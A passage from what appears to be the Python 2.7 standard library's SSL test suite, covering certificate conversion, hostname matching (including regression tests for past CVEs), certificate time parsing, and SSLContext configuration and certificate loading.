        p2 = ssl.DER_cert_to_PEM_cert(d1)
        d2 = ssl.PEM_cert_to_DER_cert(p2)
        self.assertEqual(d1, d2)
        if not p2.startswith(ssl.PEM_HEADER + '\n'):
            self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
        if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
            self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)

    def test_openssl_version(self):
        n = ssl.OPENSSL_VERSION_NUMBER
        t = ssl.OPENSSL_VERSION_INFO
        s = ssl.OPENSSL_VERSION
        self.assertIsInstance(n, (int, long))
        self.assertIsInstance(t, tuple)
        self.assertIsInstance(s, str)
        # Some sanity checks follow
        # >= 0.9
        self.assertGreaterEqual(n, 0x900000)
        # < 3.0
        self.assertLess(n, 0x30000000)
        major, minor, fix, patch, status = t
        self.assertGreaterEqual(major, 0)
        self.assertLess(major, 3)
        self.assertGreaterEqual(minor, 0)
        self.assertLess(minor, 256)
        self.assertGreaterEqual(fix, 0)
        self.assertLess(fix, 256)
        self.assertGreaterEqual(patch, 0)
        self.assertLessEqual(patch, 63)
        self.assertGreaterEqual(status, 0)
        self.assertLessEqual(status, 15)
        # Version string as returned by {Open,Libre}SSL, the format might change
        if "LibreSSL" in s:
            self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
                            (s, t))
        else:
            self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
                            (s, t))

    @support.cpython_only
    def test_refcycle(self):
        # Issue #7943: an SSL object doesn't create reference cycles with
        # itself.
        s = socket.socket(socket.AF_INET)
        ss = ssl.wrap_socket(s)
        wr = weakref.ref(ss)
        del ss
        self.assertEqual(wr(), None)

    def test_wrapped_unconnected(self):
        # Methods on an unconnected SSLSocket propagate the original
        # socket.error raise by the underlying socket object.
        s = socket.socket(socket.AF_INET)
        with closing(ssl.wrap_socket(s)) as ss:
            self.assertRaises(socket.error, ss.recv, 1)
            self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
            self.assertRaises(socket.error, ss.recvfrom, 1)
            self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
            self.assertRaises(socket.error, ss.send, b'x')
            self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))

    def test_timeout(self):
        # Issue #8524: when creating an SSL socket, the timeout of the
        # original socket should be retained.
        # Each timeout value (including None and 0.0) must survive
        # wrap_socket() unchanged.
        for timeout in (None, 0.0, 5.0):
            s = socket.socket(socket.AF_INET)
            s.settimeout(timeout)
            with closing(ssl.wrap_socket(s)) as ss:
                self.assertEqual(timeout, ss.gettimeout())

    def test_errors(self):
        # Invalid wrap_socket() argument combinations must raise ValueError
        # with a descriptive message; missing files surface as ENOENT.
        sock = socket.socket()
        self.assertRaisesRegexp(ValueError,
                                "certfile must be specified",
                                ssl.wrap_socket, sock, keyfile=CERTFILE)
        self.assertRaisesRegexp(ValueError,
                                "certfile must be specified for server-side operations",
                                ssl.wrap_socket, sock, server_side=True)
        self.assertRaisesRegexp(ValueError,
                                "certfile must be specified for server-side operations",
                                ssl.wrap_socket, sock, server_side=True, certfile="")
        with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
            self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
                                    s.connect, (HOST, 8080))
        with self.assertRaises(IOError) as cm:
            with closing(socket.socket()) as sock:
                ssl.wrap_socket(sock, certfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(IOError) as cm:
            with closing(socket.socket()) as sock:
                ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(IOError) as cm:
            with closing(socket.socket()) as sock:
                ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)

    def test_match_hostname(self):
        # ok/fail are thin helpers: ok() must not raise, fail() must raise
        # ssl.CertificateError.
        def ok(cert, hostname):
            ssl.match_hostname(cert, hostname)
        def fail(cert, hostname):
            self.assertRaises(ssl.CertificateError,
                              ssl.match_hostname, cert, hostname)

        cert = {'subject': ((('commonName', 'example.com'),),)}
        ok(cert, 'example.com')
        ok(cert, 'ExAmple.cOm')
        fail(cert, 'www.example.com')
        fail(cert, '.example.com')
        fail(cert, 'example.org')
        fail(cert, 'exampleXcom')

        cert = {'subject': ((('commonName', '*.a.com'),),)}
        ok(cert, 'foo.a.com')
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')

        # only match one left-most wildcard
        cert = {'subject': ((('commonName', 'f*.com'),),)}
        ok(cert, 'foo.com')
        ok(cert, 'f.com')
        fail(cert, 'bar.com')
        fail(cert, 'foo.a.com')
        fail(cert, 'bar.foo.com')

        # NULL bytes are bad, CVE-2013-4073
        cert = {'subject': ((('commonName', 'null.python.org\x00example.org'),),)}
        ok(cert, 'null.python.org\x00example.org') # or raise an error?
        fail(cert, 'example.org')
        fail(cert, 'null.python.org')

        # error cases with wildcards
        cert = {'subject': ((('commonName', '*.*.a.com'),),)}
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')

        cert = {'subject': ((('commonName', 'a.*.com'),),)}
        fail(cert, 'a.foo.com')
        fail(cert, 'a..com')
        fail(cert, 'a.com')

        # wildcard doesn't match IDNA prefix 'xn--'
        idna = u'püthon.python.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, idna)
        cert = {'subject': ((('commonName', 'x*.python.org'),),)}
        fail(cert, idna)
        cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
        fail(cert, idna)

        # wildcard in first fragment and IDNA A-labels in sequent fragments
        # are supported.
        idna = u'www*.pythön.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
        ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, u'pythön.org'.encode("idna").decode("ascii"))

        # Slightly fake real-world example
        cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
                'subject': ((('commonName', 'linuxfrz.org'),),),
                'subjectAltName': (('DNS', 'linuxfr.org'),
                                   ('DNS', 'linuxfr.com'),
                                   ('othername', '<unsupported>'))}
        ok(cert, 'linuxfr.org')
        ok(cert, 'linuxfr.com')
        # Not a "DNS" entry
        fail(cert, '<unsupported>')
        # When there is a subjectAltName, commonName isn't used
        fail(cert, 'linuxfrz.org')

        # A pristine real-world example
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),),
                            (('commonName', 'mail.google.com'),))}
        ok(cert, 'mail.google.com')
        fail(cert, 'gmail.com')
        # Only commonName is considered
        fail(cert, 'California')

        # Neither commonName nor subjectAltName
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),))}
        fail(cert, 'mail.google.com')

        # No DNS entry in subjectAltName but a commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('commonName', 'mail.google.com'),)),
                'subjectAltName': (('othername', 'blabla'), )}
        ok(cert, 'mail.google.com')

        # No DNS entry subjectAltName and no commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),)),
                'subjectAltName': (('othername', 'blabla'),)}
        fail(cert, 'google.com')

        # Empty cert / no cert
        self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
        self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')

        # Issue #17980: avoid denials of service by refusing more than one
        # wildcard per fragment.
        cert = {'subject': ((('commonName', 'a*b.com'),),)}
        ok(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b.co*'),),)}
        fail(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b*.com'),),)}
        with self.assertRaises(ssl.CertificateError) as cm:
            ssl.match_hostname(cert, 'axxbxxc.com')
        self.assertIn("too many wildcards", str(cm.exception))

    def test_server_side(self):
        # server_hostname doesn't work for server sockets
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        with closing(socket.socket()) as sock:
            self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
                              server_hostname="some.hostname")

    def test_unknown_channel_binding(self):
        # should raise ValueError for unknown type
        s = socket.socket(socket.AF_INET)
        with closing(ssl.wrap_socket(s)) as ss:
            with self.assertRaises(ValueError):
                ss.get_channel_binding("unknown-type")

    @unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
                         "'tls-unique' channel binding not available")
    def test_tls_unique_channel_binding(self):
        # unconnected should return None for known type
        s = socket.socket(socket.AF_INET)
        with closing(ssl.wrap_socket(s)) as ss:
            self.assertIsNone(ss.get_channel_binding("tls-unique"))
        # the same for server-side
        s = socket.socket(socket.AF_INET)
        with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
            self.assertIsNone(ss.get_channel_binding("tls-unique"))

    def test_get_default_verify_paths(self):
        # The 6-field DefaultVerifyPaths namedtuple must honour the
        # SSL_CERT_DIR / SSL_CERT_FILE environment variables.
        paths = ssl.get_default_verify_paths()
        self.assertEqual(len(paths), 6)
        self.assertIsInstance(paths, ssl.DefaultVerifyPaths)

        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            paths = ssl.get_default_verify_paths()
            self.assertEqual(paths.cafile, CERTFILE)
            self.assertEqual(paths.capath, CAPATH)

    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_enum_certificates(self):
        self.assertTrue(ssl.enum_certificates("CA"))
        self.assertTrue(ssl.enum_certificates("ROOT"))

        self.assertRaises(TypeError, ssl.enum_certificates)
        self.assertRaises(WindowsError, ssl.enum_certificates, "")

        trust_oids = set()
        for storename in ("CA", "ROOT"):
            store = ssl.enum_certificates(storename)
            self.assertIsInstance(store, list)
            for element in store:
                self.assertIsInstance(element, tuple)
                self.assertEqual(len(element), 3)
                cert, enc, trust = element
                self.assertIsInstance(cert, bytes)
                self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
                self.assertIsInstance(trust, (set, bool))
                if isinstance(trust, set):
                    trust_oids.update(trust)

        serverAuth = "1.3.6.1.5.5.7.3.1"
        self.assertIn(serverAuth, trust_oids)

    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_enum_crls(self):
        self.assertTrue(ssl.enum_crls("CA"))
        self.assertRaises(TypeError, ssl.enum_crls)
        self.assertRaises(WindowsError, ssl.enum_crls, "")

        crls = ssl.enum_crls("CA")
        self.assertIsInstance(crls, list)
        for element in crls:
            self.assertIsInstance(element, tuple)
            self.assertEqual(len(element), 2)
            self.assertIsInstance(element[0], bytes)
            self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})

    def test_asn1object(self):
        # _ASN1Object can be built from an OID, a NID, a short name or a
        # long name, and all forms must compare equal.
        expected = (129, 'serverAuth', 'TLS Web Server Authentication',
                    '1.3.6.1.5.5.7.3.1')
        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
        self.assertEqual(val, expected)
        self.assertEqual(val.nid, 129)
        self.assertEqual(val.shortname, 'serverAuth')
        self.assertEqual(val.longname, 'TLS Web Server Authentication')
        self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')

        val = ssl._ASN1Object.fromnid(129)
        self.assertEqual(val, expected)
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
        with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
            ssl._ASN1Object.fromnid(100000)
        for i in range(1000):
            try:
                obj = ssl._ASN1Object.fromnid(i)
            except ValueError:
                pass
            else:
                self.assertIsInstance(obj.nid, int)
                self.assertIsInstance(obj.shortname, str)
                self.assertIsInstance(obj.longname, str)
                self.assertIsInstance(obj.oid, (str, type(None)))

        val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
        self.assertEqual(val, expected)
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
        self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'), expected)
        with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
            ssl._ASN1Object.fromname('serverauth')

    def test_purpose_enum(self):
        # Purpose.SERVER_AUTH / CLIENT_AUTH are _ASN1Object instances with
        # the expected NID, short name and OID.
        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
        self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
        self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
        self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
        self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
        self.assertEqual(ssl.Purpose.SERVER_AUTH.oid, '1.3.6.1.5.5.7.3.1')

        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
        self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid, '1.3.6.1.5.5.7.3.2')

    def test_unsupported_dtls(self):
        # Wrapping a datagram socket must raise NotImplementedError.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.addCleanup(s.close)
        with self.assertRaises(NotImplementedError) as cx:
            ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
        self.assertEqual(str(cx.exception), "only stream sockets are supported")
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        with self.assertRaises(NotImplementedError) as cx:
            ctx.wrap_socket(s)
        self.assertEqual(str(cx.exception), "only stream sockets are supported")

    def cert_time_ok(self, timestring, timestamp):
        # Helper: timestring must parse to exactly this epoch timestamp.
        self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)

    def cert_time_fail(self, timestring):
        # Helper: timestring must be rejected with ValueError.
        with self.assertRaises(ValueError):
            ssl.cert_time_to_seconds(timestring)

    @unittest.skipUnless(utc_offset(),
                         'local time needs to be different from UTC')
    def test_cert_time_to_seconds_timezone(self):
        # Issue #19940: ssl.cert_time_to_seconds() returns wrong
        #               results if local timezone is not UTC
        self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
        self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)

    def test_cert_time_to_seconds(self):
        timestring = "Jan 5 09:34:43 2018 GMT"
        ts = 1515144883.0

        self.cert_time_ok(timestring, ts)
        # accept keyword parameter, assert its name
        self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
        # accept both %e and %d (space or zero generated by strftime)
        self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
        # case-insensitive
        self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
        self.cert_time_fail("Jan 5 09:34 2018 GMT")     # no seconds
        self.cert_time_fail("Jan 5 09:34:43 2018")      # no GMT
        self.cert_time_fail("Jan 5 09:34:43 2018 UTC")  # not GMT timezone
        self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
        self.cert_time_fail("Jon 5 09:34:43 2018 GMT")  # invalid month
        self.cert_time_fail("Jan 5 24:00:00 2018 GMT")  # invalid hour
        self.cert_time_fail("Jan 5 09:60:43 2018 GMT")  # invalid minute

        newyear_ts = 1230768000.0
        # leap seconds
        self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
        # same timestamp
        self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)

        self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
        #  allow 60th second (even if it is not a leap second)
        self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
        #  allow 2nd leap second for compatibility with time.strptime()
        self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
        self.cert_time_fail("Jan 5 09:34:62 2018 GMT")  # invalid seconds

        # no special treatement for the special value:
        #   99991231235959Z (rfc 5280)
        self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)

    @support.run_with_locale('LC_ALL', '')
    def test_cert_time_to_seconds_locale(self):
        # `cert_time_to_seconds()` should be locale independent

        def local_february_name():
            return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))

        if local_february_name().lower() == 'feb':
            self.skipTest("locale-specific month name needs to be "
                          "different from C locale")

        # locale-independent
        self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
        self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")


class ContextTests(unittest.TestCase):

    @skip_if_broken_ubuntu_ssl
    def test_constructor(self):
        # Every known protocol constant is accepted; out-of-range values and
        # a missing argument are rejected.
        for protocol in PROTOCOLS:
            ssl.SSLContext(protocol)
        self.assertRaises(TypeError, ssl.SSLContext)
        self.assertRaises(ValueError, ssl.SSLContext, -1)
        self.assertRaises(ValueError, ssl.SSLContext, 42)

    @skip_if_broken_ubuntu_ssl
    def test_protocol(self):
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.protocol, proto)

    def test_ciphers(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ciphers("ALL")
        ctx.set_ciphers("DEFAULT")
        with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
            ctx.set_ciphers("^$:,;?*'dorothyx")

    @skip_if_broken_ubuntu_ssl
    def test_options(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # OP_ALL | OP_NO_SSLv2 is the default value
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2,
                         ctx.options)
        ctx.options |= ssl.OP_NO_SSLv3
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
                         ctx.options)
        if can_clear_options():
            ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
            self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
                             ctx.options)
            ctx.options = 0
            self.assertEqual(0, ctx.options)
        else:
            with self.assertRaises(ValueError):
                ctx.options = 0

    def test_verify_mode(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Default value
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        ctx.verify_mode = ssl.CERT_OPTIONAL
        self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
        ctx.verify_mode = ssl.CERT_REQUIRED
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        ctx.verify_mode = ssl.CERT_NONE
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        # Non-int and out-of-range values are rejected.
        with self.assertRaises(TypeError):
            ctx.verify_mode = None
        with self.assertRaises(ValueError):
            ctx.verify_mode = 42

    @unittest.skipUnless(have_verify_flags(),
                         "verify_flags need OpenSSL > 0.9.8")
    def test_verify_flags(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # default value
        tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
        ctx.verify_flags = ssl.VERIFY_DEFAULT
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
        # supports any value
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
        self.assertEqual(ctx.verify_flags,
                         ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
        with self.assertRaises(TypeError):
            ctx.verify_flags = None

    def test_load_cert_chain(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Combined key and cert in a single file
        ctx.load_cert_chain(CERTFILE, keyfile=None)
        ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
        self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
        with self.assertRaises(IOError) as cm:
            ctx.load_cert_chain(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(BADCERT)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(EMPTYCERT)
        # Separate key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY)
        ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
        ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYCERT)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYKEY)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
        # Mismatching key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
            ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
        # Password protected key and cert: str, bytes and bytearray
        # passwords are all accepted, as positional or keyword argument.
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
        ctx.load_cert_chain(CERTFILE_PROTECTED,
                            password=bytearray(KEY_PASSWORD.encode()))
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
                            bytearray(KEY_PASSWORD.encode()))
        with self.assertRaisesRegexp(TypeError, "should be a string"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
        with self.assertRaises(ssl.SSLError):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
        with self.assertRaisesRegexp(ValueError, "cannot be longer"):
            # openssl has a fixed limit on the password buffer.
            # PEM_BUFSIZE is generally set to 1kb.
            # Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400) # Password callback def getpass_unicode(): return KEY_PASSWORD def getpass_bytes(): return KEY_PASSWORD.encode() def getpass_bytearray(): return bytearray(KEY_PASSWORD.encode()) def getpass_badpass(): return "badpass" def getpass_huge(): return b'a' * (1024 * 1024) def getpass_bad_type(): return 9 def getpass_exception(): raise Exception('getpass error') class GetPassCallable: def __call__(self): return KEY_PASSWORD def getpass(self): return KEY_PASSWORD ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode) ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes) ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray) ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable()) ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable().getpass) with self.assertRaises(ssl.SSLError): ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass) with self.assertRaisesRegexp(ValueError, "cannot be longer"): ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge) with self.assertRaisesRegexp(TypeError, "must return a string"): ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type) with self.assertRaisesRegexp(Exception, "getpass error"): ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception) # Make sure the password function isn't called if it isn't needed ctx.load_cert_chain(CERTFILE, password=getpass_exception) def test_load_verify_locations(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_verify_locations(CERTFILE) ctx.load_verify_locations(cafile=CERTFILE, capath=None) ctx.load_verify_locations(BYTES_CERTFILE) ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None) ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8')) self.assertRaises(TypeError, ctx.load_verify_locations) self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None) with self.assertRaises(IOError) as cm: 
            ctx.load_verify_locations(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(IOError):
            ctx.load_verify_locations(u'')
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_verify_locations(BADCERT)
        ctx.load_verify_locations(CERTFILE, CAPATH)
        ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)

        # Issue #10989: crash if the second argument type is invalid
        self.assertRaises(TypeError, ctx.load_verify_locations, None, True)

    def test_load_verify_cadata(self):
        # test cadata: in-memory CA certs in PEM and DER form, tracked
        # via cert_store_stats()["x509_ca"] counts.
        with open(CAFILE_CACERT) as f:
            cacert_pem = f.read().decode("ascii")
        cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
        with open(CAFILE_NEURONIO) as f:
            neuronio_pem = f.read().decode("ascii")
        neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)

        # test PEM
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
        ctx.load_verify_locations(cadata=cacert_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # combined
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = "\n".join((cacert_pem, neuronio_pem))
        ctx.load_verify_locations(cadata=combined)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # with junk around the certs
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = ["head", cacert_pem, "other", neuronio_pem,
                    "again", neuronio_pem, "tail"]
        ctx.load_verify_locations(cadata="\n".join(combined))
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)

        # test DER
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(cadata=cacert_der)
        ctx.load_verify_locations(cadata=neuronio_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=cacert_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) combined = b"".join((cacert_der, neuronio_der)) ctx.load_verify_locations(cadata=combined) self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2) # error cases ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object) with self.assertRaisesRegexp(ssl.SSLError, "no start line"): ctx.load_verify_locations(cadata=u"broken") with self.assertRaisesRegexp(ssl.SSLError, "not enough data"): ctx.load_verify_locations(cadata=b"broken") def test_load_dh_params(self): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.load_dh_params(DHFILE) if os.name != 'nt': ctx.load_dh_params(BYTES_DHFILE) self.assertRaises(TypeError, ctx.load_dh_params) self.assertRaises(TypeError, ctx.load_dh_params, None) with self.assertRaises(IOError) as cm: ctx.load_dh_params(WRONGCERT) self.assertEqual(cm.exception.errno, errno.ENOENT) with self.assertRaises(ssl.SSLError) as cm: ctx.load_dh_params(CERTFILE) @skip_if_broken_ubuntu_ssl def test_session_stats(self): for proto in PROTOCOLS: ctx = ssl.SSLContext(proto) self.assertEqual(ctx.session_stats(), { 'number': 0, 'connect': 0, 'connect_good': 0, 'connect_renegotiate': 0, 'accept': 0, 'accept_good': 0, 'accept_renegotiate': 0, 'hits': 0, 'misses': 0, 'timeouts': 0, 'cache_full': 0, }) def test_set_default_verify_paths(self): # There's not much we can do to test that it acts as expected, # so just check it doesn't crash or raise an exception. 
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_default_verify_paths()

